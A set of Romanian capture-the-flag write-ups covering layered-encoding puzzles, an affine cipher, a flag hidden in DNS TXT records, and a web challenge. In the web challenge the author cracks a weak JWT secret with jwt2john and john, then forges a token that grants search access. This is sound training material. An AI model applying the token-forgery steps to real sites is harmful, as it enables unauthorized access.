Mesajul de pe retea - II Autor: 0x435446 Summary Asemanator cu Mesajul de pe retea – I, am primit un mesaj encodat. Proof of Solving Pentru inceput am incercat sa trec mesajul prin base32, base58, base62 si base64, dar fara succes. De aici m-am gandit sa fac acelasi lucru, dar facut un rev() peste textul initial; tot nimic. Am mai stat putin sa ma gandesc si am incercat caesar peste text, iar la ROT 13 am reusit sa scot un text in clar, folosind base32 peste. Textul avea un padding la inceput, deci am dedus ca este scris de la dreapta la stanga. Am facut un rev() pe el si arata a text encodat cu base64. L-am decodificat si mi-a dat de brainfuck (literalmente ) ). Am luat codul, l-am bagat intr-un interpretor de brainfuck si am scos flag-ul.

Mesajul de pe retea - I Autor: 0x435446 Summary Am primit un mesaj codificat. Proof of Solving De cand am vazut padding-ul de la base64 am incercat sa vad daca as putea decodifica mesajul cu aceasta metoda. Dupa decodificare am primit in mesaj ce parea scris de la dreapta la stanga, asa ca am facut un rev() pe el si a iesit cam asa: Uvorxrgzir! Uozt-fo vhgv IHG{15vu7619v4wy40u47yv08v2v8x263vx2u688464y62598x713x1y68v0240uvwxv}. De aici am incercat diferite metode de criptare pe care se paote face usor bruteforce si am gasit ca este criptat folosind affine.

Interviul Autor: 0x435446 Summary DNS Records Proof of Solving Cand am citit prima data descrierea challenge-ului, am crezut ca trebuie sa caut recursiv prin toate paginile de pe rstcon.com si flag-ul se va gasi pe undeva printr-un comentariu, dar aparent nu era asa. Dupa ce m-am gandit putin am incercat sa verific DNS Records. Am intrat pe https://www.digwebinterface.com, am pus site-ul in textbox, am dat pe ANY Records si am gasit flag-ul in cele TXT.

Motorul de cautare pentru vulnerabilitati Autor: 0x435446 Summary Folosirea unui token jwt vulnerabil din cauza secretului. Proof of Solving Prima data am incercat pe acel search-bar de pe prima pagina cateva tipuri de atac, pentru a verifica daca site-ul este vulnerabil. De aici am cautat sa verific daca este ceva in cookie-uri sau robots.txt, dar tot nimc, insa am gasit un token pus pe hidden in sursa paginii. L-am luat, l-am decodificat base64 ca sa pot vedea continutul si am vazut asta: De aici am luat token-ul, i-am scos hash-ul cu jwt2john si i-am facut bruteforce la secret cu john. Acum am mai avut doar de craftat un token care sa aiba setat “canSearch” pe “yes”. M-am folosit de jwt.io pentru asta. Dupa ce l-am craftat am interceptat un request catre site in care am pus “flag” in search-bar, am inlocuit token-ul cu cel generat si am scos flag-ul.